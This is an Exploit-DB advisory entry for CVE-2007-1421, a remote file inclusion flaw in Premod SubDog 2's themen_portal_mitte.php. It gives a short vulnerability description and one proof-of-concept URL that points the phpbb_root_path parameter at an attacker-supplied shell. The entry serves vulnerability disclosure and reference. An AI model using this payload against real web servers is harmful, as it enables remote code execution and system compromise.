Premod SubDog 2 includes/themen_portal_mitte.php phpbb_root_path Parameter Remote File Inclusion

2007-03-10T00:00:00
ID EDB-ID:29728
Type exploitdb
Reporter Hasadya Raed
Modified 2007-03-10T00:00:00

Description

Premod SubDog 2 includes/themen_portal_mitte.php phpbb_root_path Parameter Remote File Inclusion. CVE-2007-1421. Webapps exploit for php platform

                                        
                                            source: http://www.securityfocus.com/bid/22912/info
 
Premod SubDog 2 is prone to multiple remote file-include vulnerabilities.
 
An attacker can exploit these issues to include an arbitrary remote file containing malicious PHP code and execute it in the context of the webserver process. This may allow the attacker to compromise the application and the underlying system; other attacks are also possible.
 
http://www.example.com/[path]/includes/themen_portal_mitte.php?phpbb_root_path=[Shell-Attack]